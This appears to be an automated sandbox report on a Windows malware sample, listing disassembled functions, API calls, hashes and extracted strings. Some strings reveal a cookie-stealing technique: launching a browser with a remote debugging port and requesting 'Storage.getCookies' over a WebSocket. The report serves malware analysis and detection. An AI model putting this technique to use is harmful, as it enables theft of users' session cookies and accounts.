                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32lstrcat$Closememset$HandleNextProcessstrlen$CreateDesktopOpen$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                              • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                              • API String ID: 2040986984-1862457068
                              • Opcode ID: 9a08e9768f385e786fe8bbd0d5007a743b5e80db93d75063fdf5061477ebf5b7
                              • Instruction ID: 96f029e3396e339a0e3af98174eb8b1aecfa09ae8b4b177b3ccfe1ae04d51223
                              • Opcode Fuzzy Hash: 9a08e9768f385e786fe8bbd0d5007a743b5e80db93d75063fdf5061477ebf5b7
                              • Instruction Fuzzy Hash: 13919371A00318AFDB20DFB4DC89FDE77B8AF48704F109599F649A7181DB75AA44CBA0
                              Function 00E41269 Relevance: 43.8, APIs: 29, Instructions: 336stringfileCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E41291
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E412B4
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E412BF
                              • lstrlen.KERNEL32(00E64CA8), ref: 00E412CA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E412E7
                              • lstrcat.KERNEL32(00000000,00E64CA8), ref: 00E412F3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4131E
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 00E4133A
                              • StrCmpCA.SHLWAPI(?,00E617A0), ref: 00E4135C
                              • StrCmpCA.SHLWAPI(?,00E617A4), ref: 00E41376
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E413AF
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E413D7
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E413E2
                              • lstrlen.KERNEL32(00E61794), ref: 00E413ED
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4140A
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E41416
                              • lstrlen.KERNEL32(?), ref: 00E41423
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41443
                              • lstrcat.KERNEL32(00000000,?), ref: 00E41451
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4147A
                              • StrCmpCA.SHLWAPI(?,00D2E000), ref: 00E414A3
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E414E4
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4150D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41535
                              • StrCmpCA.SHLWAPI(?,00D2E158), ref: 00E41552
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E41593
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E415BC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E415E4
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E41796
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E417BE
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E417F5
                              • FindNextFileA.KERNEL32(00000000,?), ref: 00E4181C
                              • FindClose.KERNEL32(00000000), ref: 00E4182B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                              • String ID:
                              • API String ID: 1346933759-0
                              • Opcode ID: 6cccf8965bc42a9d25884724df824742b0131317210df8f8acadb3d363839766
                              • Instruction ID: 774374244ab65f53e7b4ee0b24195c9498c17ccca87b48174be103b5ac2619d3
                              • Opcode Fuzzy Hash: 6cccf8965bc42a9d25884724df824742b0131317210df8f8acadb3d363839766
                              • Instruction Fuzzy Hash: D8C17F31A103069FCF21EF68E889AAE7BF8AF44308F056568F985B7251DB35DC45CB90
                              Function 00E4E210 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 212stringfileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 00E4E22C
                              • FindFirstFileA.KERNEL32(?,?), ref: 00E4E243
                              • StrCmpCA.SHLWAPI(?,00E617A0), ref: 00E4E263
                              • StrCmpCA.SHLWAPI(?,00E617A4), ref: 00E4E27D
                              • wsprintfA.USER32 ref: 00E4E2A2
                              • StrCmpCA.SHLWAPI(?,00E5CFEC), ref: 00E4E2B4
                              • wsprintfA.USER32 ref: 00E4E2D1
                                • Part of subcall function 00E4EDE0: lstrcpy.KERNEL32(00000000,?), ref: 00E4EE12
                              • wsprintfA.USER32 ref: 00E4E2F0
                              • PathMatchSpecA.SHLWAPI(?,?), ref: 00E4E304
                              • lstrcat.KERNEL32(?,00D2F950), ref: 00E4E335
                              • lstrcat.KERNEL32(?,00E61794), ref: 00E4E347
                              • lstrcat.KERNEL32(?,?), ref: 00E4E358
                              • lstrcat.KERNEL32(?,00E61794), ref: 00E4E36A
                              • lstrcat.KERNEL32(?,?), ref: 00E4E37E
                              • CopyFileA.KERNEL32(?,?,00000001), ref: 00E4E394
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4E3D2
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4E422
                              • DeleteFileA.KERNEL32(?), ref: 00E4E45C
                                • Part of subcall function 00E31530: lstrcpy.KERNEL32(00000000,?), ref: 00E31557
                                • Part of subcall function 00E31530: lstrcpy.KERNEL32(00000000,?), ref: 00E31579
                                • Part of subcall function 00E31530: lstrcpy.KERNEL32(00000000,?), ref: 00E3159B
                                • Part of subcall function 00E31530: lstrcpy.KERNEL32(00000000,?), ref: 00E315FF
                              • FindNextFileA.KERNEL32(00000000,?), ref: 00E4E49B
                              • FindClose.KERNEL32(00000000), ref: 00E4E4AA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                              • String ID: %s\%s$%s\*
                              • API String ID: 1375681507-2848263008
                              • Opcode ID: 65b3ef6112fe3adf0de1036081f30a8df9d29aac1c57736f2de3e7f6af3ad0d2
                              • Instruction ID: 4cc2cf514a531717413d1518332dd5bce2405bbf54aa68d13d62c4da2c49628a
                              • Opcode Fuzzy Hash: 65b3ef6112fe3adf0de1036081f30a8df9d29aac1c57736f2de3e7f6af3ad0d2
                              • Instruction Fuzzy Hash: 898182719003189FCB20EF74EC49AEE77B9BF44304F009999F65AA7255DB35AA44CFA0
                              Function 00E316B9 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 219stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E316E2
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E31719
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3176C
                              • lstrcat.KERNEL32(00000000), ref: 00E31776
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E317A2
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E318F3
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E318FE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat
                              • String ID: \*.*
                              • API String ID: 2276651480-1173974218
                              • Opcode ID: 81fa6aa1cb18e9877b5f18724940ccaf27611a6197ac91fba46cbcae03aca99b
                              • Instruction ID: 36415f50e36cb636542a730d13a2d013d77ed92d89d186b8281c0cf05ce3bd3f
                              • Opcode Fuzzy Hash: 81fa6aa1cb18e9877b5f18724940ccaf27611a6197ac91fba46cbcae03aca99b
                              • Instruction Fuzzy Hash: 2E816D319102199FCB21EF68D88DAAE7FF4AF44308F14616DFA85BB255CB359D01CBA1
                              Function 00E4DD30 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 171stringfilememoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00E4DD45
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00E4DD4C
                              • wsprintfA.USER32 ref: 00E4DD62
                              • FindFirstFileA.KERNEL32(?,?), ref: 00E4DD79
                              • StrCmpCA.SHLWAPI(?,00E617A0), ref: 00E4DD9C
                              • StrCmpCA.SHLWAPI(?,00E617A4), ref: 00E4DDB6
                              • wsprintfA.USER32 ref: 00E4DDD4
                              • DeleteFileA.KERNEL32(?), ref: 00E4DE20
                              • CopyFileA.KERNEL32(?,?,00000001), ref: 00E4DDED
                                • Part of subcall function 00E31530: lstrcpy.KERNEL32(00000000,?), ref: 00E31557
                                • Part of subcall function 00E31530: lstrcpy.KERNEL32(00000000,?), ref: 00E31579
                                • Part of subcall function 00E31530: lstrcpy.KERNEL32(00000000,?), ref: 00E3159B
                                • Part of subcall function 00E31530: lstrcpy.KERNEL32(00000000,?), ref: 00E315FF
                                • Part of subcall function 00E4D980: memset.MSVCRT ref: 00E4D9A1
                                • Part of subcall function 00E4D980: memset.MSVCRT ref: 00E4D9B3
                                • Part of subcall function 00E4D980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00E4D9DB
                                • Part of subcall function 00E4D980: lstrcpy.KERNEL32(00000000,?), ref: 00E4DA0E
                                • Part of subcall function 00E4D980: lstrcat.KERNEL32(?,00000000), ref: 00E4DA1C
                                • Part of subcall function 00E4D980: lstrcat.KERNEL32(?,00D2F320), ref: 00E4DA36
                                • Part of subcall function 00E4D980: lstrcat.KERNEL32(?,?), ref: 00E4DA4A
                                • Part of subcall function 00E4D980: lstrcat.KERNEL32(?,00D2E030), ref: 00E4DA5E
                                • Part of subcall function 00E4D980: lstrcpy.KERNEL32(00000000,?), ref: 00E4DA8E
                                • Part of subcall function 00E4D980: GetFileAttributesA.KERNEL32(00000000), ref: 00E4DA95
                              • FindNextFileA.KERNEL32(00000000,?), ref: 00E4DE2E
                              • FindClose.KERNEL32(00000000), ref: 00E4DE3D
                              • lstrcat.KERNEL32(?,00D2F950), ref: 00E4DE66
                              • lstrcat.KERNEL32(?,00D2E478), ref: 00E4DE7A
                              • lstrlen.KERNEL32(?), ref: 00E4DE84
                              • lstrlen.KERNEL32(?), ref: 00E4DE92
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4DED2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                              • String ID: %s\%s$%s\*
                              • API String ID: 4184593125-2848263008
                              • Opcode ID: afbb85925bd7896f8343471b74309be9466f0c147958b1694b5ba176d6805646
                              • Instruction ID: 6dd05cef9817643c87db91028f1c75f489832b4c7cb6801221014c4fb9a91223
                              • Opcode Fuzzy Hash: afbb85925bd7896f8343471b74309be9466f0c147958b1694b5ba176d6805646
                              • Instruction Fuzzy Hash: F8616271910208AFCB21EF74EC89AEE7BB9BF48304F0055A9F685E7255DB35AA44CB50
                              Function 00E4D530 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 183stringfileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 00E4D54D
                              • FindFirstFileA.KERNEL32(?,?), ref: 00E4D564
                              • StrCmpCA.SHLWAPI(?,00E617A0), ref: 00E4D584
                              • StrCmpCA.SHLWAPI(?,00E617A4), ref: 00E4D59E
                              • lstrcat.KERNEL32(?,00D2F950), ref: 00E4D5E3
                              • lstrcat.KERNEL32(?,00D2F940), ref: 00E4D5F7
                              • lstrcat.KERNEL32(?,?), ref: 00E4D60B
                              • lstrcat.KERNEL32(?,?), ref: 00E4D61C
                              • lstrcat.KERNEL32(?,00E61794), ref: 00E4D62E
                              • lstrcat.KERNEL32(?,?), ref: 00E4D642
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4D682
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4D6D2
                              • FindNextFileA.KERNEL32(00000000,?), ref: 00E4D737
                              • FindClose.KERNEL32(00000000), ref: 00E4D746
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 50252434-4073750446
                              • Opcode ID: 6dafdee633c15983d89059d6111631b4b6a089c20b95236ac35119d6fca7d452
                              • Instruction ID: 1a2bfe2d47e2fedfa7cd08aad00ee7fcc5cb56727adfbc84a8df2d16166b0058
                              • Opcode Fuzzy Hash: 6dafdee633c15983d89059d6111631b4b6a089c20b95236ac35119d6fca7d452
                              • Instruction Fuzzy Hash: 816152719102199FDF20EF74DC88ADE7BB8EF48304F0095A9F689A7255DB35AA44CF90
                              Function 00E548B0 Relevance: 16.1, APIs: 4, Strings: 6, Instructions: 1129COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Xinvalid_argumentstd::_
                              • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                              • API String ID: 909987262-758292691
                              • Opcode ID: 469908c96ac61531d5ff3ddd4c0e374691c131a8fc8e2b5aa8d704f5f4902d35
                              • Instruction ID: ff2e3541ea5b8a4d25419bcbf967d12c054415c2167b65138ce90b1b7e45f3e4
                              • Opcode Fuzzy Hash: 469908c96ac61531d5ff3ddd4c0e374691c131a8fc8e2b5aa8d704f5f4902d35
                              • Instruction Fuzzy Hash: FDA26B71E012199FDB20CFA8C8507EDBBB5EF44301F1485AAE919B7281DB715E89CF90
                              Function 00E423A9 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 106stringfileCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E423D4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E423F7
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E42402
                              • lstrlen.KERNEL32(\*.*), ref: 00E4240D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4242A
                              • lstrcat.KERNEL32(00000000,\*.*), ref: 00E42436
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4246A
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 00E42486
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                              • String ID: \*.*
                              • API String ID: 2567437900-1173974218
                              • Opcode ID: 8cc83e6f4fd522ac71926f924abe0f2c20fc423d23ba35764a3ca01d06a30431
                              • Instruction ID: 0b30ea8b0b39c96abc2ddebce48f5add01037abb58cd7009de18b3dbac0cc8a5
                              • Opcode Fuzzy Hash: 8cc83e6f4fd522ac71926f924abe0f2c20fc423d23ba35764a3ca01d06a30431
                              • Instruction Fuzzy Hash: ED4130316113158BCB32EF68E889A9E7BE4AF54308F44712CFA99BB111CB359C41DB90
                              Function 00E546A0 Relevance: 13.6, APIs: 9, Instructions: 54processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00E546B9
                              • Process32First.KERNEL32(00000000,00000128), ref: 00E546C9
                              • Process32Next.KERNEL32(00000000,00000128), ref: 00E546DB
                              • StrCmpCA.SHLWAPI(?,?), ref: 00E546ED
                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E54702
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00E54711
                              • CloseHandle.KERNEL32(00000000), ref: 00E54718
                              • Process32Next.KERNEL32(00000000,00000128), ref: 00E54726
                              • CloseHandle.KERNEL32(00000000), ref: 00E54731
                              Memory Dump Source
